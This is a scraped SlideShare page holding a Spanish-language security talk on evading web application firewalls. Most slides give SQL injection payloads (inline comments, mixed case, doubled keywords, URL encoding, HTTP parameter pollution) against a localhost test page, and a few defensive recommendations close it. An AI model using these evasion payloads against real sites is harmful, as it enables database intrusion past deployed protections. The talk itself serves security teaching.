SlideShare una empresa de Scribd logo
1 de 30
Descargar para leer sin conexión
BYPASSING WAF ADVANCED
“Nunca confíes en un firewall”
• Todo el contenido de esta charla es resultado de investigación con fines didácticos y
educativos. El autor no se hace responsable por el uso del conocimiento contenido en la
siguiente presentación. La información contenida debe ser utilizada únicamente para fines
éticos y con la debida autorización.
• Todo descubrimiento realizado, ha sido y será usado de forma legal. La audiencia debe asumir
todo lo que se exponga hoy, como “falso” y “sin fundamento” hasta que lo compruebe
personalmente. Limahack no es el autor directo de ninguno de los descubrimientos expuestos,
ni de las herramientas demostradas, ni los conoce.
• Todas las opiniones vertidas durante esta presentación son exclusivas del expositor, Limahack
no es responsable de ninguna de las opiniones vertidas.
DISCLAIMER
¿ WAF ?
WAF = Web Application Firewall
Es un Firewall de Aplicaciones Web, que
monitorea el trafico del protocolo HTTP.
EL ADMINISTRADOR WEB
Los administradores web
piensan que usando un
firewall para su servidor
web estarán a salvo de
ataques, pero hoy vamos
a romper el mito. xD
¿ Y PARA QUE SIRVE ?
Sirve para poder detectar “ciertas” peticiones
maliciosas con el uso de filtros y reglas definidas
dentro de una lista por el WAF.
¿ Y MI WEB ES SEGURA SI USO WAF ?
Lamentablemente si tu código es vulnerable de nada
te servirá usarlo, ya que de todas maneras
se podrá pasar los filtros para poder penetrar al
servidor web.
¿ COMO DETECTAMOS UN WAF ?
Es muy fácil, cuando introducimos comandos que
se utiliza en una Inyección SQL u otra vulnerabilidad
nos mostrara lo siguiente: (Hay tools que automatizan
el trabajo) .
A JUGAR CON LOS WAF
¿ Y COMO HAGO EL BYPASS ?
A continuación te mostrare métodos para poder
hacer el bypass y lograr penetrar al servidor web
1° Usando comentarios en la consulta
Normal
http://127.0.0.1/noticias.php?id=-1 UNION SELECT 1,2,3,4,5,6,7—
Bypass
http://127.0.0.1/noticias.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7—
La mayoría de WAF detectan pero con suerte todo es posible xD
BYPASSING WAF
2° Alterando la forma del comando
Normal
http://127.0.0.1/noticias.php?id=-1 UNION SELECT 1,2,3,4,5,6,7—
Bypass
http://127.0.0.1/noticias.php?id=-1 uNiOn sEleCt 1,2,3,4,5,6,7—
Este bypass también es detectado por algunos WAF.
Solo necesitamos un poco de suerte xD
Sigamos
BYPASSING WAF
3° Duplicando palabra clave
Normal
http://127.0.0.1/noticias.php?id=-1 UNION SELECT 1,2,3,4,5,6,7—
Bypass
http://127.0.0.1/noticias.php?id=-1 UNIunionON SELselectECT 1,2,3,4,5,6,7—
Los WAF cometen este error de filtrar palabras claves como “UNION”, “SELECT ”
pero que pasa si hacemos este tipo de consultas, confundiríamos al WAF cierto ?
Y al final la consulta se lograría con éxito
Sigamos
BYPASSING WAF
3° Usando comentarios y duplicados en la consulta
Normal
http://127.0.0.1/noticias.php?id=-1 UNION SELECT 1,2,3,4,5,6,7--
Bypass
http://127.0.0.1/noticias.php?id=-1 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4,5,6,7--
Gran parte de los WAF no detectan este método.
BYPASSING WAF
Y eso es todo ?
Pues no, ahora viene lo mas emocionante.
Si los métodos anteriores no hicieron el bypass al
WAF, aquí te mostrare métodos mas avanzados para
poder saltarlos. (Nada es seguro en esta vida)
BYPASSING WAF
4° URL Encoding
Normal
http://127.0.0.1/noticias.php?id=-1 UNION SELECT 1,2,3,4,5,6,7--
Bypass
http://127.0.0.1/noticias.php?id=-1 /*!uNI%4fn*/ /*!Sel%45Ct*/ 1,2,3,4,5,6,7--
Donde “O” es igual a “%4f” y “E” es igual a “%45”
Lo que hicimos fue colocar el valor de la letra en HEX Codificado para URL.
BYPASSING WAF
Tabla con algunos valores de URL Encoding
BYPASSING WAF
5° Usar otros comandos en la consulta
Normal
http://127.0.0.1/noticias.php?id=-1 UNION SELECT 1,2,3,4,@@version,6,7--
Bypass
http://127.0.0.1/noticias.php?id=-1 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4,version(),6,7--
Todo esta en ver si el comando esta en la lista negra y de ser el caso, usar otra
opción para poder hacer el bypass.
BYPASSING WAF
6° HTTP Parameter Pollution
Es la contaminación de parámetros que pasan por
(GET o POST) en el protocolo HTTP.
Esta técnica la podremos usar dependiendo del tipo
de tecnología en el que
este desarrollada la aplicación (PHP, ASP, JSP, etc).
BYPASSING WAF
BYPASSING WAF
¿ Y COMO APLICO LA TECNICA PARA HACER BYPASS AL WAF ?
Supongamos que dupliquemos el parámetro en la URL para alterar la
aplicación.
http://127.0.0.1/noticias.php?id= 1’  EL WAF ME BANEA =(
http://127.0.0.1/noticias.php?id= 1&id=2’  BYPASS WAF =)
En PHP, siempre evalúa la ultima variable pero si el WAF esta
configurado por defecto como en la mayoría de los casos, pasa esto.
BYPASSING WAF
Siguiendo con HTTP Parameter Pollution, podríamos hacer bypass
a un WAF sin ningún problema, ya que pocos son los WAF que se
centran en esta técnica y la potencia que tiene.
BYPASSING WAF
Así como pudimos realizar bypass a los WAF para poder realizar las
Inyecciones SQL, también podríamos concretar otros ataques , ya solo
Es cuestión de creatividad 
BYPASSING WAF
RECOMENDACIONES
- Desarrolla tus aplicaciones de forma segura, pensando como un
atacante.
- Si vas a usar WAF, no uses la configuración por defecto.
- Trata de documentarte lo mas que puedas.
Autor: Brayan Huaman Pereda
Desarrollador y Pentester
Contacto: brayan@gruporibra.com
Twitter: @brayanhpe
¿ PREGUNTAS ?
Gracias

Más contenido relacionado

La actualidad más candente

¿Cómo activar un producto ESET?
¿Cómo activar un producto ESET?¿Cómo activar un producto ESET?
¿Cómo activar un producto ESET?ESET Latinoamérica
 
Ponencia sql avanzado y automatizado
Ponencia sql avanzado y automatizadoPonencia sql avanzado y automatizado
Ponencia sql avanzado y automatizadon3xasec
 
Mantenimiento logico del computador
Mantenimiento logico del computadorMantenimiento logico del computador
Mantenimiento logico del computadorbriyithcamacho
 
Webinar: 10 Consejos para Mejorar la Postura de Seguridad de tu Sitio Web
Webinar: 10 Consejos para Mejorar la Postura de Seguridad de tu Sitio WebWebinar: 10 Consejos para Mejorar la Postura de Seguridad de tu Sitio Web
Webinar: 10 Consejos para Mejorar la Postura de Seguridad de tu Sitio WebSucuri
 
I Meetup OWASP - Seguridad en NodeJS
I  Meetup OWASP - Seguridad en NodeJSI  Meetup OWASP - Seguridad en NodeJS
I Meetup OWASP - Seguridad en NodeJSRaúl Requero García
 
20 claves de Seguridad WordPress
20 claves de Seguridad WordPress20 claves de Seguridad WordPress
20 claves de Seguridad WordPressFernando Tellado
 
Aplicar la seguridad en WordPress desde la selección de un hosting
Aplicar la seguridad en WordPress desde la selección de un hosting Aplicar la seguridad en WordPress desde la selección de un hosting
Aplicar la seguridad en WordPress desde la selección de un hosting José Conti Calveras
 
AVAST FREE/grupo los indetenibles de la o&m
AVAST FREE/grupo los indetenibles de la o&mAVAST FREE/grupo los indetenibles de la o&m
AVAST FREE/grupo los indetenibles de la o&mJeremiasMCherry
 

La actualidad más candente (13)

¿Cómo activar un producto ESET?
¿Cómo activar un producto ESET?¿Cómo activar un producto ESET?
¿Cómo activar un producto ESET?
 
Software (diagramas)
Software (diagramas)Software (diagramas)
Software (diagramas)
 
Ponencia sql avanzado y automatizado
Ponencia sql avanzado y automatizadoPonencia sql avanzado y automatizado
Ponencia sql avanzado y automatizado
 
Mantenimiento logico del computador
Mantenimiento logico del computadorMantenimiento logico del computador
Mantenimiento logico del computador
 
Webinar: 10 Consejos para Mejorar la Postura de Seguridad de tu Sitio Web
Webinar: 10 Consejos para Mejorar la Postura de Seguridad de tu Sitio WebWebinar: 10 Consejos para Mejorar la Postura de Seguridad de tu Sitio Web
Webinar: 10 Consejos para Mejorar la Postura de Seguridad de tu Sitio Web
 
I Meetup OWASP - Seguridad en NodeJS
I  Meetup OWASP - Seguridad en NodeJSI  Meetup OWASP - Seguridad en NodeJS
I Meetup OWASP - Seguridad en NodeJS
 
20 claves de Seguridad WordPress
20 claves de Seguridad WordPress20 claves de Seguridad WordPress
20 claves de Seguridad WordPress
 
66666
6666666666
66666
 
Aplicar la seguridad en WordPress desde la selección de un hosting
Aplicar la seguridad en WordPress desde la selección de un hosting Aplicar la seguridad en WordPress desde la selección de un hosting
Aplicar la seguridad en WordPress desde la selección de un hosting
 
Antivirus
AntivirusAntivirus
Antivirus
 
Algoritmos sf
Algoritmos sfAlgoritmos sf
Algoritmos sf
 
Avast antivirus
Avast antivirusAvast antivirus
Avast antivirus
 
AVAST FREE/grupo los indetenibles de la o&m
AVAST FREE/grupo los indetenibles de la o&mAVAST FREE/grupo los indetenibles de la o&m
AVAST FREE/grupo los indetenibles de la o&m
 

Destacado (20)

Atacando servicios web
Atacando servicios webAtacando servicios web
Atacando servicios web
 
EL Respeto
EL RespetoEL Respeto
EL Respeto
 
Comunicación
ComunicaciónComunicación
Comunicación
 
Photoshop en fotos oscuras - Merinadesign
Photoshop en fotos oscuras - MerinadesignPhotoshop en fotos oscuras - Merinadesign
Photoshop en fotos oscuras - Merinadesign
 
Conversemos sobre APS - Comunidad de Práctica 1
Conversemos sobre APS - Comunidad de Práctica 1Conversemos sobre APS - Comunidad de Práctica 1
Conversemos sobre APS - Comunidad de Práctica 1
 
Experiencia Twitter @medfamiliar
Experiencia Twitter @medfamiliarExperiencia Twitter @medfamiliar
Experiencia Twitter @medfamiliar
 
Ley 28518 exposicion
Ley 28518 exposicionLey 28518 exposicion
Ley 28518 exposicion
 
Luis eduardo sanchez sarrazola
Luis eduardo sanchez sarrazolaLuis eduardo sanchez sarrazola
Luis eduardo sanchez sarrazola
 
Aprendizaje basado en problemas
Aprendizaje basado en problemasAprendizaje basado en problemas
Aprendizaje basado en problemas
 
Filosofia
FilosofiaFilosofia
Filosofia
 
NATIVOS TECNOLÓGICOS!!!
NATIVOS TECNOLÓGICOS!!!NATIVOS TECNOLÓGICOS!!!
NATIVOS TECNOLÓGICOS!!!
 
Tuberculosis
TuberculosisTuberculosis
Tuberculosis
 
Presentación1
Presentación1Presentación1
Presentación1
 
Eltiemponosenseña
EltiemponosenseñaEltiemponosenseña
Eltiemponosenseña
 
Simulación reporte
Simulación reporteSimulación reporte
Simulación reporte
 
CORREO DE LA AFECTIVIDAD Educandos Sede A
CORREO DE LA AFECTIVIDAD Educandos Sede A CORREO DE LA AFECTIVIDAD Educandos Sede A
CORREO DE LA AFECTIVIDAD Educandos Sede A
 
Fichas catequesis 2015
Fichas catequesis  2015Fichas catequesis  2015
Fichas catequesis 2015
 
Proyecto gbs
Proyecto gbs Proyecto gbs
Proyecto gbs
 
Para kevin
Para kevinPara kevin
Para kevin
 
1. la familia
1. la familia1. la familia
1. la familia
 

Similar a Bypassing waf advanced

Implementación básica VMWare Data Protection 6
Implementación básica VMWare Data Protection 6Implementación básica VMWare Data Protection 6
Implementación básica VMWare Data Protection 6RaGaZoMe
 
Inyecciones sql para aprendices
Inyecciones sql para aprendicesInyecciones sql para aprendices
Inyecciones sql para aprendicesTensor
 
In seguridad de aplicaciones web
In seguridad de aplicaciones webIn seguridad de aplicaciones web
In seguridad de aplicaciones webSaul Mamani
 
Inyecciones SQL para Aprendices
Inyecciones SQL para AprendicesInyecciones SQL para Aprendices
Inyecciones SQL para AprendicesTensor
 
Webinar Gratuito: "Zed Attack Proxy"
Webinar Gratuito: "Zed Attack Proxy"Webinar Gratuito: "Zed Attack Proxy"
Webinar Gratuito: "Zed Attack Proxy"Alonso Caballero
 
Estudio sobre el uso de WordPress en 2016
Estudio sobre el uso de WordPress en 2016Estudio sobre el uso de WordPress en 2016
Estudio sobre el uso de WordPress en 2016Webempresa.com
 
Estudio sobre-el-uso-de-wordpress-2016
Estudio sobre-el-uso-de-wordpress-2016Estudio sobre-el-uso-de-wordpress-2016
Estudio sobre-el-uso-de-wordpress-2016webempresa.com
 
C:\Fakepath\Dm Trejo Produccion De Recursos[1]
C:\Fakepath\Dm Trejo Produccion De Recursos[1]C:\Fakepath\Dm Trejo Produccion De Recursos[1]
C:\Fakepath\Dm Trejo Produccion De Recursos[1]Dulce trejo
 
Pentesting con Zed Attack Proxy
Pentesting con Zed Attack ProxyPentesting con Zed Attack Proxy
Pentesting con Zed Attack ProxyAlonso Caballero
 
Webinar OWASP Zed Attack Proxy (ZAP)
Webinar OWASP Zed Attack Proxy (ZAP)Webinar OWASP Zed Attack Proxy (ZAP)
Webinar OWASP Zed Attack Proxy (ZAP)Alonso Caballero
 
Inyeccionessqlparaaprendices complemento clase 1
Inyeccionessqlparaaprendices complemento clase 1Inyeccionessqlparaaprendices complemento clase 1
Inyeccionessqlparaaprendices complemento clase 1Tensor
 
Migración VDP 6.0 a VDP 6.1.1
Migración VDP 6.0 a VDP 6.1.1Migración VDP 6.0 a VDP 6.1.1
Migración VDP 6.0 a VDP 6.1.1RaGaZoMe
 
Webinar Gratuito "Zed Attack Proxy"
Webinar Gratuito "Zed Attack Proxy"Webinar Gratuito "Zed Attack Proxy"
Webinar Gratuito "Zed Attack Proxy"Alonso Caballero
 
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"Webinar Gratuito: "Tomar Control de un Servidor con Armitage"
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"Alonso Caballero
 
Informe sobre WordPress 2015: Seguridad, Velocidad y SEO
Informe sobre WordPress 2015: Seguridad, Velocidad y SEOInforme sobre WordPress 2015: Seguridad, Velocidad y SEO
Informe sobre WordPress 2015: Seguridad, Velocidad y SEOWebempresa.com
 
Vulnerability assessment and exploitation
Vulnerability assessment and exploitationVulnerability assessment and exploitation
Vulnerability assessment and exploitationTensor
 
VULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATIONVULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATIONTensor
 
Owasp top 10_2007_spanish
Owasp top 10_2007_spanishOwasp top 10_2007_spanish
Owasp top 10_2007_spanishTommy Clive
 

Similar a Bypassing waf advanced (20)

Implementación básica VMWare Data Protection 6
Implementación básica VMWare Data Protection 6Implementación básica VMWare Data Protection 6
Implementación básica VMWare Data Protection 6
 
Inyecciones sql para aprendices
Inyecciones sql para aprendicesInyecciones sql para aprendices
Inyecciones sql para aprendices
 
In seguridad de aplicaciones web
In seguridad de aplicaciones webIn seguridad de aplicaciones web
In seguridad de aplicaciones web
 
Inyecciones SQL para Aprendices
Inyecciones SQL para AprendicesInyecciones SQL para Aprendices
Inyecciones SQL para Aprendices
 
Webinar Gratuito: "Zed Attack Proxy"
Webinar Gratuito: "Zed Attack Proxy"Webinar Gratuito: "Zed Attack Proxy"
Webinar Gratuito: "Zed Attack Proxy"
 
Estudio sobre el uso de WordPress en 2016
Estudio sobre el uso de WordPress en 2016Estudio sobre el uso de WordPress en 2016
Estudio sobre el uso de WordPress en 2016
 
Estudio sobre-el-uso-de-wordpress-2016
Estudio sobre-el-uso-de-wordpress-2016Estudio sobre-el-uso-de-wordpress-2016
Estudio sobre-el-uso-de-wordpress-2016
 
C:\Fakepath\Dm Trejo Produccion De Recursos[1]
C:\Fakepath\Dm Trejo Produccion De Recursos[1]C:\Fakepath\Dm Trejo Produccion De Recursos[1]
C:\Fakepath\Dm Trejo Produccion De Recursos[1]
 
Pentesting con Zed Attack Proxy
Pentesting con Zed Attack ProxyPentesting con Zed Attack Proxy
Pentesting con Zed Attack Proxy
 
Webinar OWASP Zed Attack Proxy (ZAP)
Webinar OWASP Zed Attack Proxy (ZAP)Webinar OWASP Zed Attack Proxy (ZAP)
Webinar OWASP Zed Attack Proxy (ZAP)
 
Inyeccionessqlparaaprendices complemento clase 1
Inyeccionessqlparaaprendices complemento clase 1Inyeccionessqlparaaprendices complemento clase 1
Inyeccionessqlparaaprendices complemento clase 1
 
Web application firewall
Web application firewallWeb application firewall
Web application firewall
 
Migración VDP 6.0 a VDP 6.1.1
Migración VDP 6.0 a VDP 6.1.1Migración VDP 6.0 a VDP 6.1.1
Migración VDP 6.0 a VDP 6.1.1
 
Webinar Gratuito "Zed Attack Proxy"
Webinar Gratuito "Zed Attack Proxy"Webinar Gratuito "Zed Attack Proxy"
Webinar Gratuito "Zed Attack Proxy"
 
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"Webinar Gratuito: "Tomar Control de un Servidor con Armitage"
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"
 
Informe sobre WordPress 2015: Seguridad, Velocidad y SEO
Informe sobre WordPress 2015: Seguridad, Velocidad y SEOInforme sobre WordPress 2015: Seguridad, Velocidad y SEO
Informe sobre WordPress 2015: Seguridad, Velocidad y SEO
 
Vulnerability assessment and exploitation
Vulnerability assessment and exploitationVulnerability assessment and exploitation
Vulnerability assessment and exploitation
 
ESAPI
ESAPIESAPI
ESAPI
 
VULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATIONVULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATION
 
Owasp top 10_2007_spanish
Owasp top 10_2007_spanishOwasp top 10_2007_spanish
Owasp top 10_2007_spanish
 

Bypassing waf advanced

  • 1.
  • 2.
  • 3.
  • 4.
  • 5. BYPASSING WAF ADVANCED “Nunca confíes en un firewall”
  • 6. • Todo el contenido de esta charla es resultado de investigación con fines didácticos y educativos. El autor no se hace responsable por el uso del conocimiento contenido en la siguiente presentación. La información contenida debe ser utilizada únicamente para fines éticos y con la debida autorización. • Todo descubrimiento realizado, ha sido y será usado de forma legal. La audiencia debe asumir todo lo que se exponga hoy, como “falso” y “sin fundamento” hasta que lo compruebe personalmente. Limahack no es el autor directo de ninguno de los descubrimientos expuestos, ni de las herramientas demostradas, ni los conoce. • Todas las opiniones vertidas durante esta presentación son exclusivas del expositor, Limahack no es responsable de ninguna de las opiniones vertidas. DISCLAIMER
  • 7. ¿ WAF ? WAF = Web Application Firewall Es un Firewall de Aplicaciones Web, que monitorea el trafico del protocolo HTTP.
  • 8. EL ADMINISTRADOR WEB Los administradores web piensan que usando un firewall para su servidor web estarán a salvo de ataques, pero hoy vamos a romper el mito. xD
  • 9. ¿ Y PARA QUE SIRVE ? Sirve para poder detectar “ciertas” peticiones maliciosas con el uso de filtros y reglas definidas dentro de una lista por el WAF.
  • 10. ¿ Y MI WEB ES SEGURA SI USO WAF ? Lamentablemente si tu código es vulnerable de nada te servirá usarlo, ya que de todas maneras se podrá pasar los filtros para poder penetrar al servidor web.
  • 11. ¿ COMO DETECTAMOS UN WAF ? Es muy fácil, cuando introducimos comandos que se utiliza en una Inyección SQL u otra vulnerabilidad nos mostrara lo siguiente: (Hay tools que automatizan el trabajo) .
  • 12. A JUGAR CON LOS WAF
  • 13.
  • 14. ¿ Y COMO HAGO EL BYPASS ? A continuación te mostrare métodos para poder hacer el bypass y lograr penetrar al servidor web 1° Usando comentarios en la consulta Normal http://127.0.0.1/noticias.php?id=-1 UNION SELECT 1,2,3,4,5,6,7— Bypass http://127.0.0.1/noticias.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7— La mayoría de WAF detectan pero con suerte todo es posible xD
  • 15. BYPASSING WAF 2° Alterando la forma del comando Normal http://127.0.0.1/noticias.php?id=-1 UNION SELECT 1,2,3,4,5,6,7— Bypass http://127.0.0.1/noticias.php?id=-1 uNiOn sEleCt 1,2,3,4,5,6,7— Este bypass también es detectado por algunos WAF. Solo necesitamos un poco de suerte xD Sigamos
  • 16. BYPASSING WAF 3° Duplicando palabra clave Normal http://127.0.0.1/noticias.php?id=-1 UNION SELECT 1,2,3,4,5,6,7— Bypass http://127.0.0.1/noticias.php?id=-1 UNIunionON SELselectECT 1,2,3,4,5,6,7— Los WAF cometen este error de filtrar palabras claves como “UNION”, “SELECT ” pero que pasa si hacemos este tipo de consultas, confundiríamos al WAF cierto ? Y al final la consulta se lograría con éxito Sigamos
  • 17. BYPASSING WAF 3° Usando comentarios y duplicados en la consulta Normal http://127.0.0.1/noticias.php?id=-1 UNION SELECT 1,2,3,4,5,6,7-- Bypass http://127.0.0.1/noticias.php?id=-1 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4,5,6,7-- Gran parte de los WAF no detectan este método.
  • 18. BYPASSING WAF Y eso es todo ? Pues no, ahora viene lo mas emocionante. Si los métodos anteriores no hicieron el bypass al WAF, aquí te mostrare métodos mas avanzados para poder saltarlos. (Nada es seguro en esta vida)
  • 19. BYPASSING WAF 4° URL Encoding Normal http://127.0.0.1/noticias.php?id=-1 UNION SELECT 1,2,3,4,5,6,7-- Bypass http://127.0.0.1/noticias.php?id=-1 /*!uNI%4fn*/ /*!Sel%45Ct*/ 1,2,3,4,5,6,7-- Donde “O” es igual a “%4f” y “E” es igual a “%45” Lo que hicimos fue colocar el valor de la letra en HEX Codificado para URL.
  • 20. BYPASSING WAF Tabla con algunos valores de URL Encoding
  • 21. BYPASSING WAF 5° Usar otros comandos en la consulta Normal http://127.0.0.1/noticias.php?id=-1 UNION SELECT 1,2,3,4,@@version,6,7-- Bypass http://127.0.0.1/noticias.php?id=-1 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4,version(),6,7-- Todo esta en ver si el comando esta en la lista negra y de ser el caso, usar otra opción para poder hacer el bypass.
  • 22. BYPASSING WAF 6° HTTP Parameter Pollution Es la contaminación de parámetros que pasan por (GET o POST) en el protocolo HTTP. Esta técnica la podremos usar dependiendo del tipo de tecnología en el que este desarrollada la aplicación (PHP, ASP, JSP, etc).
  • 24. BYPASSING WAF ¿ Y COMO APLICO LA TECNICA PARA HACER BYPASS AL WAF ? Supongamos que dupliquemos el parámetro en la URL para alterar la aplicación. http://127.0.0.1/noticias.php?id= 1’  EL WAF ME BANEA =( http://127.0.0.1/noticias.php?id= 1&id=2’  BYPASS WAF =) En PHP, siempre evalúa la ultima variable pero si el WAF esta configurado por defecto como en la mayoría de los casos, pasa esto.
  • 25. BYPASSING WAF Siguiendo con HTTP Parameter Pollution, podríamos hacer bypass a un WAF sin ningún problema, ya que pocos son los WAF que se centran en esta técnica y la potencia que tiene.
  • 26. BYPASSING WAF Así como pudimos realizar bypass a los WAF para poder realizar las Inyecciones SQL, también podríamos concretar otros ataques , ya solo Es cuestión de creatividad 
  • 27. BYPASSING WAF RECOMENDACIONES - Desarrolla tus aplicaciones de forma segura, pensando como un atacante. - Si vas a usar WAF, no uses la configuración por defecto. - Trata de documentarte lo mas que puedas.
  • 28. Autor: Brayan Huaman Pereda Desarrollador y Pentester Contacto: brayan@gruporibra.com Twitter: @brayanhpe